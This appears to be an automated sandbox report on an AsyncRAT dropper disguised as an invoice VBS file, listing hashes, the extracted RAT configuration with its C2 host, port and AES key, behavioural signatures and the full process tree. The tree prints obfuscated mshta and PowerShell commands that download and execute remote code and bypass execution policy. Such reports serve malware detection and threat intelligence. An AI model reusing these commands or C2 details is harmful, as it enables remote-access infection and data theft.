Analysis
max time kernel: 146s
max time network: 148s
platform: windows10_x64
resource: win10v20210408
submitted: 27-04-2021 15:14

Static task: static1
Behavioral task: behavioral1
Sample: invoice954423.vbs
Resource: win7v20210410
General
Target: invoice954423.vbs
Size: 236B
MD5: 755e0f945656b708f911ff7438ee3dda
SHA1: 147e7d2fad41deea7b15801a815dd80c340ae9b2
SHA256: 4622e0560aaa02a43009773a1c42f8017cae6b63f0f7950b358c22d46c757e1c
SHA512: 3d6c7eab9ac8ecd9fc4b8ce2f22026444500c4fc6327c674e5298a0eb3ea23ac7e9b173c67cb4fa67ce223e2dfbd0f7b338e60d5d00320ebaf6ba969d2b5d00f
Malware Config
Extracted: asyncrat 0.5.7B, C2 bad96.ddns.net:1996, mutex AsyncMutex_6SI8OkPnk
aes_key: wV8wYBZRpKZKwS4P6oMapiOlrel4uoXW
anti_detection: false
autorun: false
bdos: false
delay: Default
host: bad96.ddns.net
hwid: 3
install_file:
install_folder: %AppData%
mutex: AsyncMutex_6SI8OkPnk
pastebin_config: null
port: 1996
version: 0.5.7B
Signatures
Async RAT payload (2 IoCs)
  resource behavioral2/memory/2332-181-0x0000000000400000-0x0000000000412000-memory.dmp, yara_rule asyncrat
  resource behavioral2/memory/2332-182-0x000000000040C70E-mapping.dmp, yara_rule asyncrat
Blocklisted process makes network request (6 IoCs)
  flow 7, pid 4024, process mshta.exe
  flow 12, pid 4024, process mshta.exe
  flow 14, pid 4024, process mshta.exe
  flow 15, pid 192, process powershell.exe
  flow 21, pid 192, process powershell.exe
  flow 22, pid 192, process powershell.exe
Suspicious use of SetThreadContext (1 IoCs)
  PID 424 set thread context of 2332: pid 424, process powershell.exe, target process aspnet_compiler.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid 192, process powershell.exe (x3)
  pid 424, process powershell.exe (x3)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, pid 192, process powershell.exe
  Token: SeDebugPrivilege, pid 424, process powershell.exe
Suspicious use of WriteProcessMemory (18 IoCs)
  PID 1032 wrote to memory of 4024: pid 1032, process WScript.exe, target process mshta.exe (x2)
  PID 4024 wrote to memory of 192: pid 4024, process mshta.exe, target process powershell.exe (x2)
  PID 192 wrote to memory of 720: pid 192, process powershell.exe, target process cmd.exe (x2)
  PID 720 wrote to memory of 816: pid 720, process cmd.exe, target process mshta.exe (x2)
  PID 816 wrote to memory of 424: pid 816, process mshta.exe, target process powershell.exe (x2)
  PID 424 wrote to memory of 2332: pid 424, process powershell.exe, target process aspnet_compiler.exe (x8)
Processes (process tree, each entry is a child of the one above it)
1. C:\Windows\System32\WScript.exe
   command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice954423.vbs"
   - Suspicious use of WriteProcessMemory
  2. C:\Windows\System32\mshta.exe
     command line: "C:\Windows\System32\mshta.exe" https://nyc002.hawkhost.com/~mazencom/neww/3.txt
     - Blocklisted process makes network request
     - Suspicious use of WriteProcessMemory
    3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://nyc002.hawkhost.com/~mazencom/neww/2.txt') ;
       - Blocklisted process makes network request
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious use of WriteProcessMemory
      4. C:\Windows\system32\cmd.exe
         command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\chrome.bat" "
         - Suspicious use of WriteProcessMemory
        5. C:\Windows\system32\mshta.exe
           command line: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""p"+"ow"+"ersh"+"ell -Ex"+"ecuti"+"onPol"+"icy Bypa"+"ss & 'C"+":\Us"+"ers\P"+"ubl"+"ic\msi"+".ps1'"", 0:close")
           - Suspicious use of WriteProcessMemory
          6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
             command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
             - Suspicious use of SetThreadContext
             - Suspicious behavior: EnumeratesProcesses
             - Suspicious use of AdjustPrivilegeToken
             - Suspicious use of WriteProcessMemory
            7. C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
               command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: ea6243fdb2bfcca2211884b0a21a0afc
  SHA1: 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
  SHA256: 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
  SHA512: 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 415731551acc036e1004f2ef257a0180
  SHA1: 07276d736deda6efaae21ea706ffd50ae95467a9
  SHA256: a78371e5bb6c5afce20db6248455fe5d60f04a3548af7eab651c25d966b5bbcd
  SHA512: 7a132f6b9f244a55a00d02812463d476b1c64c423cd5b560f640fe3ecfb024ae73e5fa18a70d0d7eb7d91cc8f3dff8452a0ed0998aa7d80ce725c28f3e7da5f3
C:\Users\Public\chrome.bat
  MD5: 1151fa07f8501963f789e793d38a5938
  SHA1: 8831c4ba8773c88e006579a105295a39cf2d3c22
  SHA256: 656b70e849a752e1f529a17ce27a897a1e3c8a383002c3b3d89c25eb34a67254
  SHA512: 37035273ad0621422403e85535172814e87896e854676aaf40741ad701efd4892642987e9d3a2d070cba7e881d5eadd657174b46de6e6ec50380cc295a03bc7e
C:\Users\Public\msi.ps1
  MD5: 63744b513e19eb511a7bb66870824cd0
  SHA1: 073e681e42bc390b1ad076ac43932b593a8ff439
  SHA256: 7db96ca84f97ade18337169368f3043cb8c00b7767c3f40b8ce503ecaa898edc
  SHA512: 6262c3b64db8aabcd7cf4665887be5d29df5e1fa9875668e5ba3a1751689cfd31275ee61e1ba6bc5c68cc64e652271855a36701eee24c1291129d699e800cafd

Memory dumps
memory/192-116-0x0000000000000000-mapping.dmp
memory/192-122-0x000002EA5A150000-0x000002EA5A151000-memory.dmp (Filesize: 4KB)
memory/192-127-0x000002EA5A180000-0x000002EA5A182000-memory.dmp (Filesize: 8KB)
memory/192-128-0x000002EA5A183000-0x000002EA5A185000-memory.dmp (Filesize: 8KB)
memory/192-129-0x000002EA5AD60000-0x000002EA5AD61000-memory.dmp (Filesize: 4KB)
memory/192-136-0x000002EA5A186000-0x000002EA5A188000-memory.dmp (Filesize: 8KB)
memory/424-154-0x0000000000000000-mapping.dmp
memory/424-171-0x00000135C76C0000-0x00000135C76C2000-memory.dmp (Filesize: 8KB)
memory/424-172-0x00000135C76C3000-0x00000135C76C5000-memory.dmp (Filesize: 8KB)
memory/424-175-0x00000135C9110000-0x00000135C9128000-memory.dmp (Filesize: 96KB)
memory/424-180-0x00000135C76C6000-0x00000135C76C8000-memory.dmp (Filesize: 8KB)
memory/720-149-0x0000000000000000-mapping.dmp
memory/816-152-0x0000000000000000-mapping.dmp
memory/2332-181-0x0000000000400000-0x0000000000412000-memory.dmp (Filesize: 72KB)
memory/2332-182-0x000000000040C70E-mapping.dmp
memory/2332-186-0x00000000053A0000-0x00000000053A1000-memory.dmp (Filesize: 4KB)
memory/4024-114-0x0000000000000000-mapping.dmp